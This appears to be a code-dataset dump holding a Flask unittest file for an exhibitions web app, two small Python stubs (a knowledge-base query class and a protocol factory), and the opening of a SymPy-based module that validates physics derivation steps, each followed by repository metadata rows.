walkthrough='',
cb_presentation='',
license_mailed='',
license_signed='',
license_borough='',
bond='',
coi='',
coi_renewal='',
signage_submit='',
signage_received='',
press_draft='',
press_approved='',
web_text='',
work_images='',
deinstall_date='2019-06-05',
deinstall_check='',
bond_return='',
press_clippings=''
)
@staticmethod
def create_exhibition(**kwargs):
"""
Static method to add exhibition class object to database
Takes the following string args: name, start_date, end_date, opening, comments, install_start, install_end, prm, approval, walkthrough, cb_presentation, license_mailed, license_signed, license_borough, bond, coi, coi_renewal, signage_submit, signage_received, press_draft, press_approved, web_text, work_images, deinstall_date, deinstall_check, bond_return, press_clippings
Adds class to exhibition database, commits session, and flushes to get id val
Returns the created class instance
"""
exhibition = Exhibition(**kwargs)
db.session.add(exhibition)
db.session.commit()
db.session.flush()
return exhibition
# Test exhibitions page logged in
def test_valid_exhibitions_logged_in(self):
with self.app as c:
with c.session_transaction() as sess:
sess['url'] = '/'
self.login()
response = self.app.get('/exhibitions', follow_redirects=True)
req = request.url
self.assertIn(b'/exhibitions', req)
self.assertEqual(response.status_code, 200)
# Test exhibitions page not logged in
def test_invalid_exhibitions_not_logged_in(self):
with self.app:
response = self.app.get('/exhibitions', follow_redirects=True)
req = request.url
self.assertIn(b'/login', req)
self.assertEqual(response.status_code, 200)
# Test exhibition page logged in
def test_valid_exhibition_logged_in(self):
exhibition = self.default_exhibition
# Add exhibition to database
self.create_exhibition(**exhibition)
with self.app as c:
with c.session_transaction() as sess:
sess['url'] = '/'
self.login()
response = self.app.get('/exhibitions/1', follow_redirects=True)
req = request.url
self.assertIn(b'/exhibitions/1', req)
self.assertEqual(response.status_code, 200)
# Test exhibition page not logged in
def test_invalid_exhibition_not_logged_in(self):
exhibition = self.default_exhibition
# Add exhibition to database
self.create_exhibition(**exhibition)
with self.app:
response = self.app.get('/orgs/1', follow_redirects=True)
req = request.url
self.assertIn(b'/login', req)
self.assertEqual(response.status_code, 200)
# Test exhibition page with no exhibitions
def test_invalid_exhibition_no_exhibitions(self):
with self.app as c:
with c.session_transaction() as sess:
sess['url'] = '/'
self.login()
response = self.app.get('/exhibitions/1', follow_redirects=True)
req = request.url
self.assertIn(b'/exhibitions/1', req)
self.assertEqual(response.status_code, 404)
# Test GET exhibition CREATE page
def test_invalid_exhibition_create_get(self):
with self.app:
response = self.app.get('/exhibitions/create', follow_redirects=True)
self.assertIn('Method Not Allowed', response.data)
self.assertEqual(response.status_code, 405)
# Test exhibition CREATE page logged in
def test_valid_exhibition_create_post(self):
exhibition = self.default_exhibition_string
with self.app as c:
with c.session_transaction() as sess:
sess['url'] = '/'
self.login()
response = self.app.post(
'/exhibitions/create',
data=exhibition,
follow_redirects=True
)
self.assertIn('"success": true', response.data)
self.assertEqual(response.status_code, 200)
# Test exhibition CREATE page not logged in
def test_invalid_exhibition_create_post(self):
exhibition = self.default_exhibition_string
with self.app as c:
response = self.app.post(
'/exhibitions/create',
data=exhibition,
follow_redirects=True
)
req = request.url
self.assertIn(b'/login', req)
self.assertEqual(response.status_code, 200)
# Test POST exhibition EDIT page logged in
def test_valid_exhibition_edit_post(self):
exhibition = self.default_exhibition
new_exhibition = 'Swankier Exhibition'
# Add exhibition to database
self.create_exhibition(**exhibition)
with self.app as c:
with c.session_transaction() as sess:
sess['url'] = '/'
self.login()
response = self.app.post(
'/exhibitions/1/edit',
data=dict(
name=new_exhibition,
start_date=self.default_exhibition_string['start_date'],
end_date=self.default_exhibition_string['end_date'],
opening=self.default_exhibition_string['opening'],
comments=exhibition['comments'],
install_start=self.default_exhibition_string['install_start'],
install_end=self.default_exhibition_string['install_end'],
prm=exhibition['prm'],
approval=exhibition['approval'],
walkthrough=exhibition['walkthrough'],
cb_presentation=exhibition['cb_presentation'],
license_mailed=exhibition['license_mailed'],
license_signed=exhibition['license_signed'],
license_borough=exhibition['license_borough'],
bond=exhibition['bond'],
coi=exhibition['coi'],
coi_renewal=exhibition['coi_renewal'],
signage_submit=exhibition['signage_submit'],
signage_received=exhibition['signage_received'],
press_draft=exhibition['press_draft'],
press_approved=exhibition['press_approved'],
web_text=exhibition['web_text'],
work_images=exhibition['work_images'],
deinstall_date=self.default_exhibition_string['deinstall_date'],
deinstall_check=exhibition['deinstall_check'],
bond_return=exhibition['bond_return'],
press_clippings=exhibition['press_clippings']
),
follow_redirects=True
)
self.assertIn('"success": true', response.data)
self.assertIn(new_exhibition, response.data)
self.assertEqual(response.status_code, 200)
# Test POST exhibition EDIT page not logged in
def tesit_invalid_exhbition_edit_post(self):
exhibition = self.default_exhibition_string
# Add exhibition to database
self.create_exhbition(**exhibition)
new_exhibition = 'Swankier Exhibition'
with self.app as c:
response = self.app.post(
'/exhibitions/1/edit',
data=dict(
name=new_exhibition,
start_date=self.default_exhibition_string['start_date'],
end_date=self.default_exhibition_string['end_date'],
opening=self.default_exhibition_string['opening'],
comments=exhibition['comments'],
install_start=self.default_exhibition_string['install_start'],
install_end=self.default_exhibition_string['install_end'],
prm=exhibition['prm'],
approval=exhibition['approval'],
walkthrough=exhibition['walkthrough'],
cb_presentation=exhibition['cb_presentation'],
license_mailed=exhibition['license_mailed'],
license_signed=exhibition['license_signed'],
license_borough=exhibition['license_borough'],
bond=exhibition['bond'],
coi=exhibition['coi'],
coi_renewal=exhibition['coi_renewal'],
signage_submit=exhibition['signage_submit'],
signage_received=exhibition['signage_received'],
press_draft=exhibition['press_draft'],
press_approved=exhibition['press_approved'],
web_text=exhibition['web_text'],
work_images=exhibition['work_images'],
deinstall_date=self.default_exhibition_string['deinstall_date'],
deinstall_check=exhibition['deinstall_check'],
bond_return=exhibition['bond_return'],
press_clippings=exhibition['press_clippings']
),
follow_redirects=True
)
req = request.url
self.assertIn(b'/login', req)
self.assertEqual(response.status_code, 200)
# Test exhibition DELETE page logged in
def test_valid_exhibition_delete_post(self):
exhibition = self.default_exhibition
# Add exhibition to database
self.create_exhibition(**exhibition)
with self.app as c:
with c.session_transaction() as sess:
sess['url'] = '/'
self.login()
response = self.app.post(
'/exhibitions/1/delete',
follow_redirects=True
)
req = request.url
retry = self.app.get(
'/exhibitions/1',
follow_redirects=True
)
self.assertIn('/exhibitions', req)
self.assertEqual(response.status_code, 200)
self.assertEqual(retry.status_code, 404)
# Test exhibition DELETE page not logged in
def test_invalid_exhibition_delete_post(self):
exhibition = self.default_exhibition
# Add exhibition to database
self.create_exhibition(**exhibition)
with self.app as c:
response = self.app.post(
'/exhibitions/1/delete',
follow_redirects=True
)
req = request.url
self.assertIn(b'/login', req)
self.assertEqual(response.status_code, 200)
| 31.589385
| 377
| 0.653285
| 1,280
| 11,309
| 5.555469
| 0.114844
| 0.02461
| 0.059063
| 0.056954
| 0.844466
| 0.809731
| 0.772184
| 0.731121
| 0.697792
| 0.681058
| 0
| 0.016746
| 0.234327
| 11,309
| 358
| 378
| 31.589385
| 0.804481
| 0.106906
| 0
| 0.736059
| 0
| 0
| 0.116173
| 0.004177
| 0
| 0
| 0
| 0
| 0.096654
| 1
| 0.052045
| false
| 0.003717
| 0.022305
| 0
| 0.096654
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
451a23badf4d19e5fabba0be2d632d17fe497571
| 147
|
py
|
Python
|
tatk/util/kb_query.py
|
yqzhangthu/tatk
|
4d27e89604a33f19f1c7b8fe5dc92d4ba6c6f10a
|
[
"Apache-2.0"
] | 2
|
2020-09-05T13:12:44.000Z
|
2020-10-12T16:51:16.000Z
|
tatk/util/kb_query.py
|
yqzhangthu/tatk
|
4d27e89604a33f19f1c7b8fe5dc92d4ba6c6f10a
|
[
"Apache-2.0"
] | null | null | null |
tatk/util/kb_query.py
|
yqzhangthu/tatk
|
4d27e89604a33f19f1c7b8fe5dc92d4ba6c6f10a
|
[
"Apache-2.0"
] | 1
|
2019-11-25T15:34:33.000Z
|
2019-11-25T15:34:33.000Z
|
"""Base Class for Knowledge Base Query"""
class KBquery:
def __init__(self):
pass
def query(self, constrains):
return []
| 16.333333
| 41
| 0.605442
| 17
| 147
| 5
| 0.705882
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.285714
| 147
| 9
| 42
| 16.333333
| 0.809524
| 0.238095
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.4
| false
| 0.2
| 0
| 0.2
| 0.8
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
|
0
| 6
|
451cb47d1fe9f92d3a2dbbf39cd8ae2b191621d3
| 109
|
py
|
Python
|
vyked/protocol_factory.py
|
shivank-gupta/vyked
|
98836b3230775c5ad52dfc72291b2958d3a244c9
|
[
"MIT"
] | 57
|
2015-02-28T07:42:45.000Z
|
2021-11-13T08:41:06.000Z
|
vyked/protocol_factory.py
|
niks660097/async_framework
|
57591d167bee365d5aa9bb5446b952095506e040
|
[
"MIT"
] | 106
|
2015-05-27T05:34:06.000Z
|
2021-04-21T04:34:42.000Z
|
vyked/protocol_factory.py
|
nerandell/vyked
|
7b2554454a50110e15928db7105e074a9e521517
|
[
"MIT"
] | 22
|
2015-05-27T05:08:15.000Z
|
2018-09-18T12:08:25.000Z
|
from .jsonprotocol import VykedProtocol
def get_vyked_protocol(handler):
return VykedProtocol(handler)
| 18.166667
| 39
| 0.816514
| 12
| 109
| 7.25
| 0.833333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.12844
| 109
| 5
| 40
| 21.8
| 0.915789
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 6
|
453e63a876bca43571fa442690cc6881535530f5
| 78,539
|
py
|
Python
|
v7_pickle_web_interface/flask/validate_steps_sympy.py
|
iammosespaulr/proofofconcept
|
3f2bd8cba8d1f42b78f834fdfa05afc34d074f78
|
[
"CC-BY-4.0"
] | null | null | null |
v7_pickle_web_interface/flask/validate_steps_sympy.py
|
iammosespaulr/proofofconcept
|
3f2bd8cba8d1f42b78f834fdfa05afc34d074f78
|
[
"CC-BY-4.0"
] | null | null | null |
v7_pickle_web_interface/flask/validate_steps_sympy.py
|
iammosespaulr/proofofconcept
|
3f2bd8cba8d1f42b78f834fdfa05afc34d074f78
|
[
"CC-BY-4.0"
] | null | null | null |
#!/usr/bin/env python3
# Physics Derivation Graph
# Ben Payne, 2020
# https://creativecommons.org/licenses/by/4.0/
# Attribution 4.0 International (CC BY 4.0)
import sympy # type: ignore
# the following is only relevant for doctests
from sympy.parsing.latex import parse_latex # type: ignore
import common_lib as clib
from typing import Tuple # , TextIO
import logging
import random
import re
import latex_to_sympy
logger = logging.getLogger(__name__)
# many of the validation functions are from
# https://github.com/allofphysicsgraph/proofofconcept/blob/gh-pages/v2_XML/databases/inference_rules_database.xml
# https://pymotw.com/3/doctest/
# how to use doctest for the entire file:
# python -m doctest -v validate_inference_rules_sympy.py
# testing per function on the command line:
# import doctest
# from validate_inference_rules_sympy import *
# doctest.run_docstring_examples(split_expr_into_lhs_rhs, globals(), verbose=True)
# I wasn't able to get the following to work:
# from doctest import testmod
# from validate_inference_rules_sympy import *
# testmod(name ='split_expr_into_lhs_rhs', verbose = True)
def validate_step(deriv_id: str, step_id: str, path_to_db: str) -> str:
"""
The possible return strings from this function include:
* "no validation is available..." (e.g., for declarations)
* "no check performed" (the check is not implemented yet)
* "valid"
* "diff is ..."
>>> validate_step('4924823', '2500423', 'data.json')
"""
trace_id = str(random.randint(1000000, 9999999))
logger.info("[trace start " + trace_id + "]")
logger.debug("step ID = " + step_id)
# return "no check performed for improved latency"
dat = clib.read_db(path_to_db)
step_dict = dat["derivations"][deriv_id]["steps"][step_id]
# logger.debug("validate_step; step_dict = %s", step_dict)
if step_dict["inf rule"] in [
"declare initial expr",
"declare final expr",
"declare identity",
"declare guess solution",
"declare assumption",
]:
logger.info("[trace end " + trace_id + "]")
return "no validation is available for declarations"
if step_dict["inf rule"] in [
"assume N dimensions",
"normalization condition",
"boundary condition",
"boundary condition for expr",
]:
logger.info("[trace end " + trace_id + "]")
return "no validation is available for assumptions"
latex_dict = {}
latex_dict["input"] = {}
latex_dict["feed"] = {}
latex_dict["output"] = {}
for connection_type in ["inputs", "outputs"]:
indx = 0
for expr_local_id in step_dict[connection_type]:
expr_global_id = dat["expr local to global"][expr_local_id]
ast_str = dat["expressions"][expr_global_id]["AST"]
logger.debug(
step_id + " " + expr_local_id + " " + expr_global_id + " is " + ast_str
)
if len(ast_str) > 0:
expr = latex_to_sympy.get_sympy_expr_from_AST_str(ast_str)
LHS = expr.lhs
RHS = expr.rhs
latex_dict[connection_type[:-1]][indx] = {"LHS": LHS, "RHS": RHS}
indx += 1
else:
raise Exception(
"missing AST for expr "
+ expr_global_id
+ ", aka "
+ expr_local_id
+ " in step "
+ step_id
)
indx = 0
for expr_local_id in step_dict["feeds"]:
expr_global_id = dat["expr local to global"][expr_local_id]
ast_str = dat["expressions"][expr_global_id]["AST"]
if len(ast_str) > 0:
latex_dict["feed"][indx] = latex_to_sympy.get_sympy_expr_from_AST_str(
ast_str
)
indx += 1
else:
raise Exception(
"missing AST for expr "
+ expr_global_id
+ ", aka "
+ expr_local_id
+ " in step "
+ step_id
)
logger.debug("step_id = " + step_id)
logger.debug(str(latex_dict))
logger.debug(step_dict["inf rule"])
if step_dict["inf rule"] == "add X to both sides":
logger.info("[trace end " + trace_id + "]")
return add_X_to_both_sides(latex_dict)
elif step_dict["inf rule"] == "subtract X from both sides":
logger.info("[trace end " + trace_id + "]")
return subtract_X_from_both_sides(latex_dict)
elif step_dict["inf rule"] == "multiply both sides by":
logger.info("[trace end " + trace_id + "]")
return multiply_both_sides_by(latex_dict)
elif step_dict["inf rule"] == "divide both sides by":
logger.info("[trace end " + trace_id + "]")
return divide_both_sides_by(latex_dict)
elif step_dict["inf rule"] == "change variable X to Y":
logger.info("[trace end " + trace_id + "]")
return change_variable_X_to_Y(latex_dict)
elif step_dict["inf rule"] == "add zero to LHS":
logger.info("[trace end " + trace_id + "]")
return add_zero_to_LHS(latex_dict)
elif step_dict["inf rule"] == "add zero to RHS":
logger.info("[trace end " + trace_id + "]")
return add_zero_to_RHS(latex_dict)
elif step_dict["inf rule"] == "multiply LHS by unity":
logger.info("[trace end " + trace_id + "]")
return multiply_LHS_by_unity(latex_dict)
elif step_dict["inf rule"] == "multiply RHS by unity":
logger.info("[trace end " + trace_id + "]")
return multiply_RHS_by_unity(latex_dict)
elif step_dict["inf rule"] == "swap LHS with RHS":
logger.info("[trace end " + trace_id + "]")
return swap_LHS_with_RHS(latex_dict)
elif step_dict["inf rule"] == "take curl of both sides":
logger.info("[trace end " + trace_id + "]")
return take_curl_of_both_sides(latex_dict)
elif step_dict["inf rule"] == "apply divergence":
logger.info("[trace end " + trace_id + "]")
return apply_divergence(latex_dict)
elif step_dict["inf rule"] == "indefinite integral over":
logger.info("[trace end " + trace_id + "]")
return indefinite_integral_over(latex_dict)
elif step_dict["inf rule"] == "indefinite integration":
logger.info("[trace end " + trace_id + "]")
return indefinite_integration(latex_dict)
elif step_dict["inf rule"] == "indefinite integrate LHS over":
logger.info("[trace end " + trace_id + "]")
return indefinite_integrate_LHS_over(latex_dict)
elif step_dict["inf rule"] == "indefinite integrate RHS over":
logger.info("[trace end " + trace_id + "]")
return indefinite_integrate_RHS_over(latex_dict)
elif step_dict["inf rule"] == "integrate over from to":
logger.info("[trace end " + trace_id + "]")
return integrate_over_from_to(latex_dict)
elif step_dict["inf rule"] == "partially differentiate with respect to":
logger.info("[trace end " + trace_id + "]")
return partially_differentiate_with_respect_to(latex_dict)
elif step_dict["inf rule"] == "X cross both sides by":
logger.info("[trace end " + trace_id + "]")
return X_cross_both_sides_by(latex_dict)
elif step_dict["inf rule"] == "both sides cross X":
logger.info("[trace end " + trace_id + "]")
return both_sides_cross_X(latex_dict)
elif step_dict["inf rule"] == "X dot both sides":
logger.info("[trace end " + trace_id + "]")
return X_dot_both_sides(latex_dict)
elif step_dict["inf rule"] == "both sides dot X":
logger.info("[trace end " + trace_id + "]")
return both_sides_dot_X(latex_dict)
elif step_dict["inf rule"] == "make expr power":
logger.info("[trace end " + trace_id + "]")
return make_expr_power(latex_dict)
elif step_dict["inf rule"] == "select real parts":
logger.info("[trace end " + trace_id + "]")
return select_real_parts(latex_dict)
elif step_dict["inf rule"] == "select imag parts":
logger.info("[trace end " + trace_id + "]")
return select_imag_parts(latex_dict)
elif step_dict["inf rule"] == "sum exponents LHS":
logger.info("[trace end " + trace_id + "]")
return sum_exponents_LHS(latex_dict)
elif step_dict["inf rule"] == "sum exponents RHS":
logger.info("[trace end " + trace_id + "]")
return sum_exponents_RHS(latex_dict)
elif step_dict["inf rule"] == "add expr 1 to expr 2":
logger.info("[trace end " + trace_id + "]")
return add_expr_1_to_expr_2(latex_dict)
elif step_dict["inf rule"] == "substitute RHS of expr 1 into expr 2":
logger.info("[trace end " + trace_id + "]")
return substitute_RHS_of_expr_1_into_expr_2(latex_dict)
elif step_dict["inf rule"] == "substitute LHS of expr 1 into expr 2":
logger.info("[trace end " + trace_id + "]")
return substitute_LHS_of_expr_1_into_expr_2(latex_dict)
elif step_dict["inf rule"] == "mult expr 1 by expr 2":
logger.info("[trace end " + trace_id + "]")
return mult_expr_1_by_expr_2(latex_dict)
elif step_dict["inf rule"] == "LHS of expr 1 equals LHS of expr 2":
logger.info("[trace end " + trace_id + "]")
return LHS_of_expr_1_eq_LHS_of_expr_2(latex_dict)
elif step_dict["inf rule"] == "RHS of expr 1 equals RHS of expr 2":
logger.info("[trace end " + trace_id + "]")
return RHS_of_expr_1_eq_RHS_of_expr_2(latex_dict)
elif step_dict["inf rule"] == "raise both sides to power":
logger.info("[trace end " + trace_id + "]")
return raise_both_sides_to_power(latex_dict)
elif step_dict["inf rule"] == "claim expr 1 equals expr 2":
logger.info("[trace end " + trace_id + "]")
return claim_expr_1_equals_expr_2(latex_dict)
elif step_dict["inf rule"] == "claim LHS equals RHS":
logger.info("[trace end " + trace_id + "]")
return claim_LHS_equals_RHS(latex_dict)
elif step_dict["inf rule"] == "expand integrand":
logger.info("[trace end " + trace_id + "]")
return expand_integrand(latex_dict)
elif step_dict["inf rule"] == "function is even":
logger.info("[trace end " + trace_id + "]")
return function_is_even(latex_dict)
elif step_dict["inf rule"] == "function is odd":
logger.info("[trace end " + trace_id + "]")
return function_is_odd(latex_dict)
elif step_dict["inf rule"] == "conjugate function X":
logger.info("[trace end " + trace_id + "]")
return conjugate_function_X(latex_dict)
elif step_dict["inf rule"] == "conjugate both sides":
logger.info("[trace end " + trace_id + "]")
return conjugate_both_sides(latex_dict)
elif step_dict["inf rule"] == "conjugate transpose both sides":
logger.info("[trace end " + trace_id + "]")
return conjugate_transpose_both_sides(latex_dict)
elif step_dict["inf rule"] == "distribute conjugate transpose to factors":
logger.info("[trace end " + trace_id + "]")
return distribute_conjugate_transpose_to_factors(latex_dict)
elif step_dict["inf rule"] == "distribute conjugate to factors":
logger.info("[trace end " + trace_id + "]")
return distribute_conjugate_to_factors(latex_dict)
elif step_dict["inf rule"] == "expand magnitude to conjugate":
logger.info("[trace end " + trace_id + "]")
return expand_magnitude_to_conjugate(latex_dict)
elif step_dict["inf rule"] == "replace scalar with vector":
logger.info("[trace end " + trace_id + "]")
return replace_scalar_with_vector(latex_dict)
elif step_dict["inf rule"] == "simplify":
logger.info("[trace end " + trace_id + "]")
return simplify(latex_dict)
elif step_dict["inf rule"] == "factor out X":
logger.info("[trace end " + trace_id + "]")
return factor_out_x(latex_dict)
elif step_dict["inf rule"] == "factor out X from LHS":
logger.info("[trace end " + trace_id + "]")
return factor_out_x_from_lhs(latex_dict)
elif step_dict["inf rule"] == "factor out X from RHS":
logger.info("[trace end " + trace_id + "]")
return factor_out_x_from_rhs(latex_dict)
elif step_dict["inf rule"] == "differentiate with respect to":
logger.info("[trace end " + trace_id + "]")
return differentiate_with_respect_to(latex_dict)
elif step_dict["inf rule"] == "apply function to both sides of expression":
logger.info("[trace end " + trace_id + "]")
return apply_function_to_both_sides_of_expression(latex_dict)
elif step_dict["inf rule"] == "substitute LHS of two expressions into expr":
logger.info("[trace end " + trace_id + "]")
return substitute_LHS_of_two_expressions_into_expr(latex_dict)
elif step_dict["inf rule"] == "substitute LHS of three expressions into expr":
logger.info("[trace end " + trace_id + "]")
return substitute_LHS_of_three_expressions_into_expr(latex_dict)
elif step_dict["inf rule"] == "substitute LHS of four expressions into expr":
logger.info("[trace end " + trace_id + "]")
return substitute_LHS_of_four_expressions_into_expr(latex_dict)
elif step_dict["inf rule"] == "substitute LHS of five expressions into expr":
logger.info("[trace end " + trace_id + "]")
return substitute_LHS_of_five_expressions_into_expr(latex_dict)
elif step_dict["inf rule"] == "substitute LHS of six expressions into expr":
logger.info("[trace end " + trace_id + "]")
return substitute_LHS_of_six_expressions_into_expr(latex_dict)
elif step_dict["inf rule"] == "expr 1 is equivalent to expr 2 under the condition":
logger.info("[trace end " + trace_id + "]")
return expr_is_equivalent_to_expr_under_the_condition(latex_dict)
elif step_dict["inf rule"] == "change two variables in expr":
logger.info("[trace end " + trace_id + "]")
return change_two_variables_in_expr(latex_dict)
elif step_dict["inf rule"] == "change three variables in expr":
logger.info("[trace end " + trace_id + "]")
return change_three_variables_in_expr(latex_dict)
elif step_dict["inf rule"] == "change four variables in expr":
logger.info("[trace end " + trace_id + "]")
return change_four_variables_in_expr(latex_dict)
elif step_dict["inf rule"] == "change five variables in expr":
logger.info("[trace end " + trace_id + "]")
return change_five_variables_in_expr(latex_dict)
elif step_dict["inf rule"] == "change six variables in expr":
logger.info("[trace end " + trace_id + "]")
return change_six_variables_in_expr(latex_dict)
elif step_dict["inf rule"] == "LHS of expr 1 equals LHS of expr 2":
logger.info("[trace end " + trace_id + "]")
return LHS_of_expr_equals_LHS_of_expr(latex_dict)
elif step_dict["inf rule"] == "square root both sides":
logger.info("[trace end " + trace_id + "]")
return square_root_both_sides(latex_dict)
elif step_dict["inf rule"] == "divide expr 1 by expr 2":
logger.info("[trace end " + trace_id + "]")
return divide_expr_by_expr(latex_dict)
elif step_dict["inf rule"] == "separate two vector components":
logger.info("[trace end " + trace_id + "]")
return separate_two_vector_components(latex_dict)
elif step_dict["inf rule"] == "separate three vector components":
logger.info("[trace end " + trace_id + "]")
return separate_three_vector_components(latex_dict)
elif step_dict["inf rule"] == "separate vector into two trigonometric ratios":
logger.info("[trace end " + trace_id + "]")
return separate_vector_into_two_trigonometric_ratios(latex_dict)
elif step_dict["inf rule"] == "maximum of expr":
logger.info("[trace end " + trace_id + "]")
return maximum_of_expr(latex_dict)
elif step_dict["inf rule"] == "evaluate definite integral":
logger.info("[trace end " + trace_id + "]")
return evaluate_definite_integral(latex_dict)
elif step_dict["inf rule"] == "expr 1 is true under condition expr 2":
logger.info("[trace end " + trace_id + "]")
return expr_is_true_under_condition_expr(latex_dict)
elif step_dict["inf rule"] == "declare variable replacement":
logger.info("[trace end " + trace_id + "]")
return declare_variable_replacement(latex_dict)
elif step_dict["inf rule"] == "integrate":
logger.info("[trace end " + trace_id + "]")
return integrate(latex_dict)
elif step_dict["inf rule"] == "replace constant with value":
logger.info("[trace end " + trace_id + "]")
return replace_constant_with_value(latex_dict)
elif step_dict["inf rule"] == "expand LHS":
logger.info("[trace end " + trace_id + "]")
return expand_LHS(latex_dict)
elif step_dict["inf rule"] == "expand RHS":
logger.info("[trace end " + trace_id + "]")
return expand_RHS(latex_dict)
elif step_dict["inf rule"] == "multiply expr 1 by expr 2":
logger.info("[trace end " + trace_id + "]")
return multiply_expr_by_expr(latex_dict)
elif step_dict["inf rule"] == "apply operator to bra":
logger.info("[trace end " + trace_id + "]")
return apply_operator_to_bra(latex_dict)
elif step_dict["inf rule"] == "apply operator to ket":
logger.info("[trace end " + trace_id + "]")
return apply_operator_to_ket(latex_dict)
elif step_dict["inf rule"] == "drop non-dominant term":
logger.info("[trace end " + trace_id + "]")
return drop_nondominant_term(latex_dict)
elif step_dict["inf rule"] == "apply gradient to scalar function":
logger.info("[trace end " + trace_id + "]")
return apply_gradient_to_scalar_function(latex_dict)
# elif step_dict["inf rule"] == "":
# logger.info("[trace end " + trace_id + "]")
# return (latex_dict)
# elif step_dict["inf rule"] == "":
# logger.info("[trace end " + trace_id + "]")
# return (latex_dict)
# elif step_dict["inf rule"] == "":
# logger.info("[trace end " + trace_id + "]")
# return (latex_dict)
# elif step_dict["inf rule"] == "":
# logger.info("[trace end " + trace_id + "]")
# return (latex_dict)
# elif step_dict["inf rule"] == "":
# logger.info("[trace end " + trace_id + "]")
# return (latex_dict)
# elif step_dict["inf rule"] == "":
# logger.info("[trace end " + trace_id + "]")
# return (latex_dict)
# elif step_dict["inf rule"] == "":
# logger.info("[trace end " + trace_id + "]")
# return (latex_dict)
elif step_dict["inf rule"] == "subtract expr 1 from expr 2":
logger.info("[trace end " + trace_id + "]")
return subtract_expr_1_from_expr_2(latex_dict)
else:
logger.error("unexpected inf rule:" + step_dict["inf rule"])
raise Exception("Unexpected inf rule: " + step_dict["inf rule"])
logger.info("[trace end " + trace_id + "]")
return "This message should not be seen"
def add_X_to_both_sides(latex_dict: dict) -> str:
"""
https://docs.sympy.org/latest/gotchas.html#double-equals-signs
https://stackoverflow.com/questions/37112738/sympy-comparing-expressions
Given a = b
add c to both sides
get a + c = b + c
>>> latex_dict = {}
>>> latex_dict['input'] = [{'LHS': parse_latex('a'), 'RHS': parse_latex('b')}]
>>> latex_dict['feed'] = [parse_latex('c')]
>>> latex_dict['output'] = [{'LHS': parse_latex('a + c'), 'RHS': parse_latex('b + c')}]
>>> add_X_to_both_sides(latex_dict)
'step is valid'
"""
trace_id = str(random.randint(1000000, 9999999))
logger.info("[trace start " + trace_id + "]")
d1 = sympy.simplify(
sympy.Add(latex_dict["input"][0]["LHS"], latex_dict["feed"][0])
- latex_dict["output"][0]["LHS"]
)
d2 = sympy.simplify(
sympy.Add(latex_dict["input"][0]["RHS"], latex_dict["feed"][0])
- latex_dict["output"][0]["RHS"]
)
if (d1 == 0) and (d2 == 0):
logger.info("[trace end " + trace_id + "]")
return "valid"
else:
logger.info("[trace end " + trace_id + "]")
return "LHS diff is " + str(d1) + "\n" + "RHS diff is " + str(d2)
def subtract_X_from_both_sides(latex_dict: dict) -> str:
"""
https://docs.sympy.org/latest/tutorial/manipulation.html
Rather than have "add X to both sides" and "subtract X from both sides"
as separate inference rules, we could write "subtract X from both sides"
to use "add X to both sides"
Given a = b
subtract c
get a - c = b - c
>>> latex_dict = {}
>>> latex_dict['input'] = [{'LHS': parse_latex('a'), 'RHS': parse_latex('b')}]
>>> latex_dict['feed'] = [parse_latex('c')]
>>> latex_dict['output'] = [{'LHS': parse_latex('a - c'), 'RHS': parse_latex('b - c')}]
>>> subtract_X_from_both_sides(latex_dict)
'step is valid'
"""
trace_id = str(random.randint(1000000, 9999999))
logger.info("[trace start " + trace_id + "]")
d1 = sympy.simplify(
sympy.Add(latex_dict["input"][0]["LHS"], sympy.Mul(-1, latex_dict["feed"][0]))
- latex_dict["output"][0]["LHS"]
)
d2 = sympy.simplify(
sympy.Add(latex_dict["input"][0]["RHS"], sympy.Mul(-1, latex_dict["feed"][0]))
- latex_dict["output"][0]["RHS"]
)
if (d1 == 0) and (d2 == 0):
logger.info("[trace end " + trace_id + "]")
return "valid"
else:
logger.info("[trace end " + trace_id + "]")
return "LHS diff is " + str(d1) + "\n" + "RHS diff is " + str(d2)
def multiply_both_sides_by(latex_dict: dict) -> str:
"""
see also dividebothsidesby
x*y = Mul(x,y)
given 'a + b = c'
multiply both sides by d
to get '(a + b)*d = c*d'
>>> latex_dict = {}
>>> latex_dict['input'] = [{'LHS': parse_latex('a + b'), 'RHS': parse_latex('c')}]
>>> latex_dict['feed'] = [parse_latex('d')]
>>> latex_dict['output'] = [{'LHS': parse_latex('(a + b)*d'), 'RHS': parse_latex('c*d')}]
>>> multiply_both_sides_by(latex_dict)
'step is valid'
"""
trace_id = str(random.randint(1000000, 9999999))
logger.info("[trace start " + trace_id + "]")
d1 = sympy.simplify(
sympy.Mul(latex_dict["input"][0]["LHS"], latex_dict["feed"][0])
- latex_dict["output"][0]["LHS"]
)
d2 = sympy.simplify(
sympy.Mul(latex_dict["input"][0]["RHS"], latex_dict["feed"][0])
- latex_dict["output"][0]["RHS"]
)
if (d1 == 0) and (d2 == 0):
logger.info("[trace end " + trace_id + "]")
return "valid"
else:
logger.info("[trace end " + trace_id + "]")
return "LHS diff is " + str(d1) + "\n" + "RHS diff is " + str(d2)
def divide_both_sides_by(latex_dict: dict) -> str:
"""
see also multiply_both_sides_by
https://docs.sympy.org/latest/tutorial/manipulation.html
x/y = Mul(x, Pow(y, -1))
given 'a + b = c'
divide both sides by d
to get '(a + b)/d = c/d'
>>> latex_dict = {}
